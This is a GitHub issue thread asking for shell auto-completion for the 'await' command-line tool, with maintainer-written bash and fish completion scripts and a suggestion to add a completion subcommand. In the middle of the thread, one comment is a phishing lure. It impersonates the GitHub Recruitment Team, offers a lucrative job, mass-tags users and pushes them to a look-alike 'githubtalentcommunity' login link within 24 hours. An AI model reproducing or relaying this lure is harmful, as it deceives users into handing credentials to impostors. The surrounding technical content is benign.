### ISSUE TITLE
Feature request: Bash auto-completion

### ISSUE THREAD

**Issue by vdun** [slavaGanzin/await#5]

**Comment by slavaGanzin** [comment]
```bash
_await.1() {
  IFS='' read -r -d '' descriptions <<'EOF'
--help: '#print this help.'
-o,--stdout: '#print stdout of commands.'
-V,--silent: '#do not print spinners and commands.'
-f,--fail: '#waiting commands to fail.'
-s,--status: '#expected status \[default: 0\].'
-a,--any: '#terminate if any of command return expected status.'
-c,--change: '#waiting for stdout to change and ignore status codes.'
-e,--exec: '#run some shell command on success; .'
-F,--forever: '#do not exit ever.'
-S,--service: '#create systemd user service with same parameters and activate it .'

EOF

  COMPREPLY=()
  local cur
  cur=$(_get_cword)
  IFS='' read -r -d '' completions <<'EOF'
--help
-o
--stdout
-V
--silent
-f
--fail
-s
--status
-a
--any
-c
--change
-e
--exec
-F
--forever
-S
--service
-i
--interval
--daemon

EOF

  if [ -z "$cur" ]; then
      if declare -f _filedir &>/dev/null; then
          _filedir
      else
          COMPREPLY=( $(compgen -f -- "$cur") )
      fi
      return 0
  fi

  COMPREPLY=( $( compgen -W "$completions" -- "$cur" ) )
  if [[ ${#COMPREPLY[*]} -gt 1 ]]; then
      echo ""
      while read -r line; do
          [[ "$line" == "$cur"* ]] && echo "$line"
      done <<< "$descriptions"
  fi

  return 0
}
complete -F _await.1 await
```

Could you try to save this to a file and source it?
I'm not using bash for over 12 years, so I don't know how bash completions should look like.
Is it ok?

Because for me it doesn't seem so useful. 

p.s. Switch to fish or zsh, and you'll never look back

**Comment by slavaGanzin** [comment]
@vdun

**Comment by vdun** [comment]
Thanks. Can you make for zsh then or whatever shell ?
PS: I'm using zsh, and there are multiple tools to convert them to zsh.

**Comment by slavaGanzin** [comment]
This one is for fish
```fish
complete -c await -l help -d '#print this help'
complete -c await -l stdout -s o -d '#print stdout of commands'
complete -c await -l silent -s V -d '#do not print spinners and commands'
complete -c await -l fail -s f -d '#waiting commands to fail'
complete -c await -l status -s s -d '#expected status [default: 0]'
complete -c await -l any -s a -d '#terminate if any of command return expected status'
complete -c await -l change -s c -d '#waiting for stdout to change and ignore status codes'
complete -c await -l exec -s e -d '#run some shell command on success; '
complete -c await -l forever -s F -d '#do not exit ever'
complete -c await -l service -s S -d '#create systemd user service with same parameters and activate it '
complete -c await -l interval -s i
complete -c await -l daemon
```

And you can try https://github.com/dim-an/cod

**Comment by vdun** [comment]
Thanks.
Can you make a pull request for it ?
`cod` is great, but it does not add the descriptions of each option.

**Comment by sweeper02** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
imballinst, @sunwuyan, @lianghuiyuan, @gabriellukke, @DiagoSmith, @Bassem-2000, @aicanhelp, @jmcauhy, @lagosnomad, @superdc, @RenatoLopes771, @ArthasShuang, @akr7205, @flacial, @derfabianpeter, @CherryKitten, @mhw1902, @ThomasNickerson, @MrMarik, @ak

**Comment by flacial** [comment]
Job baits on GitHub are WILD.

**Comment by mh166** [comment]
> The problem is I don't know how to distribute these files with await.

I think the easiest way that I have seen so far is to provide a parameter or subcommand for this purpose to the binary. So, for example, if called like `await --completion=bash` it would only print out the script for the desired shell and not run `await` like usual.

This allows it to still be a single binary while providing always up-to-date completion scripts. 😊

<details>
<summary>Example of <code>tailscale completion --help</code> (click to show)</summary>
<br>

```
$ tailscale completion --help
Shell tab-completion scripts

USAGE
  tailscale completion <shell> [--flags] [--descs]

To load completions:

Bash:

        $ source <(tailscale completion bash)

        # To load completions for each session, execute once:
        # Linux:
        $ tailscale completion bash > /etc/bash_completion.d/tailscale
        # macOS:
        $ tailscale completion bash > $(brew --prefix)/etc/bash_completion.d/tailscale

Zsh:

        # If shell completion is not already enabled in your environment,
        # you will need to enable it.  You can execute the following once:

        $ echo "autoload -U compinit; compinit" >> ~/.zshrc

        # To load completions for each session, execute once:
        $ tailscale completion zsh > "${fpath[1]}/_tailscale"

        # You will need to start a new shell for this setup to take effect.

fish:

        $ tailscale completion fish | source

        # To load completions for each session, execute once:
        $ tailscale completion fish > ~/.config/fish/completions/tailscale.fish

PowerShell:

        PS> tailscale completion powershell | Out-String | Invoke-Expression

        # To load completions for every new session, run:
        PS> tailscale completion powershell > tailscale.ps1
        # and source this file from your PowerShell profile.

The shell scripts and this help message have been adapted from the
Cobra project (https://cobra.dev, https://github.com/spf13/cobra)
under the Apache-2.0 license. Thank you for making these available.


SUBCOMMANDS
  bash        Generate bash shell completion script
  zsh         Generate zsh shell completion script
  fish        Generate fish shell completion script
  powershell  Generate powershell completion script
```

</details>

**Comment by slavaGanzin** [comment]
https://github.com/slavaGanzin/await?tab=readme-ov-file#completions

@vdun please check
@mh166 thanks for the idea
